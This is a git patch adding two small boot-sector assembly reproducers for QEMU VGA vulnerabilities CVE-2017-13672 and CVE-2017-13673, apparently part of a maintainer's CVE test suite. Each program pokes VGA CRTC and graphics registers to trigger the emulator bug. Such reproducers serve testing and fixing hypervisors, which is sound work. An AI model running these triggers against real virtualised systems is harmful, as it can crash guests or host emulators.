From 2339ec544399cd66930643817ba1cb1094ddccfa Mon Sep 17 00:00:00 2001
From: Gerd Hoffmann <kraxel@redhat.com>
Date: Wed, 30 Aug 2017 15:54:02 +0200
Subject: add cve-2017-13672 + cve-2017-13673 reproducers

---
 .gitignore              |  1 +
 Makefile                |  6 +++++-
 boot-cve-2017-13672.asm | 25 ++++++++++++++++++++++++
 boot-cve-2017-13673.asm | 51 +++++++++++++++++++++++++++++++++++++++++++++++++
 4 files changed, 82 insertions(+), 1 deletion(-)
 create mode 100644 boot-cve-2017-13672.asm
 create mode 100644 boot-cve-2017-13673.asm

diff --git a/.gitignore b/.gitignore
index 20225f6..8ddcd7c 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,4 @@
 cve-[0-9][0-9][0-9][0-9]-[0-9][0-9][0-9][0-9]
+boot-*.raw
 *.o
 *~
diff --git a/Makefile b/Makefile
index ac72595..1232fee 100644
--- a/Makefile
+++ b/Makefile
@@ -6,7 +6,8 @@ CFLAGS	+= -Wall
 CVETEST := cve-2016-3712
 PCITEST	:= cve-2017-2615 cve-2017-2620
 USBTEST	:= cve-2017-5898
-TARGETS	:= $(CVETEST) $(PCITEST) $(USBTEST)
+RAWTEST := boot-cve-2017-13672.raw boot-cve-2017-13673.raw
+TARGETS	:= $(CVETEST) $(PCITEST) $(USBTEST) $(RAWTEST)
 DEPENDS	:= libpci libusb-1.0
 
 $(PCITEST) : CFLAGS += $(shell pkg-config --cflags libpci)
@@ -40,6 +41,9 @@ clean:
 	rm -f $(TARGETS)
 	rm -f *~ *.o
 
+boot-%.raw: boot-%.asm
+	nasm -o $@ $<
+
 cve-2017-2615: cve-2017-2615.o pci.o cirrus.o
 cve-2017-2620: cve-2017-2620.o pci.o cirrus.o
 cve-2017-5898: cve-2017-5898.o usb.o
diff --git a/boot-cve-2017-13672.asm b/boot-cve-2017-13672.asm
new file mode 100644
index 0000000..2d9ca9d
--- /dev/null
+++ b/boot-cve-2017-13672.asm
@@ -0,0 +1,25 @@
+; From: David Buchanan <d@vidbuchanan.co.uk>
+;
+; compiles to boot sector, pass as disk to qemu to run the code.
+;
+        BITS    16
+
+        ORG     0x7C00
+
+        mov     ax, 0x4F02
+        mov     bx, 0x4118 ; 1024x768x24, LFB enabled
+        int     0x10 ; init VESA graphics via BIOS
+
+        mov     dx, 0x3d4
+        mov     al, 0x1d
+        out     dx, al
+
+        mov     dx, 0x3d5
+        in      al, dx
+        or      al, 0x80
+        out     dx, al
+
+        jmp     $
+
+        TIMES   510-($-$$) DB 0
+        DW      0xAA55          ; boot signature
diff --git a/boot-cve-2017-13673.asm b/boot-cve-2017-13673.asm
new file mode 100644
index 0000000..21d5f3d
--- /dev/null
+++ b/boot-cve-2017-13673.asm
@@ -0,0 +1,51 @@
+; From: David Buchanan <d@vidbuchanan.co.uk>
+;
+; compiles to boot sector, pass as disk to qemu to run the code.
+;
+
+	BITS	16
+
+	ORG	0x7C00
+	
+	mov	dx, 0x3d4 ; start_addr high byte
+	mov	al, 0x0c
+	out	dx, al
+	
+	mov	dx, 0x3d5
+	mov	al, 0xff
+	out	dx, al
+	
+	
+	mov	dx, 0x3d4 ; line_compare
+	mov	al, 0x07
+	out	dx, al
+	
+	mov	dx, 0x3d5
+	in	al, dx
+	and	al, ~0x10
+	out	dx, al
+	
+	
+	mov	dx, 0x3d4 ; line_compare
+	mov	al, 0x09
+	out	dx, al
+	
+	mov	dx, 0x3d5
+	in	al, dx
+	and	al, ~0x40
+	out	dx, al
+	
+	
+	mov	dx, 0x3ce ; gfx mode
+	mov	al, 0x06
+	out	dx, al
+	
+	mov	dx, 0x3cf
+	mov	al, 0x01
+	out	dx, al
+	
+
+	jmp	$
+
+	TIMES	510-($-$$) DB 0
+	DW	0xAA55		; boot signature
-- 
cgit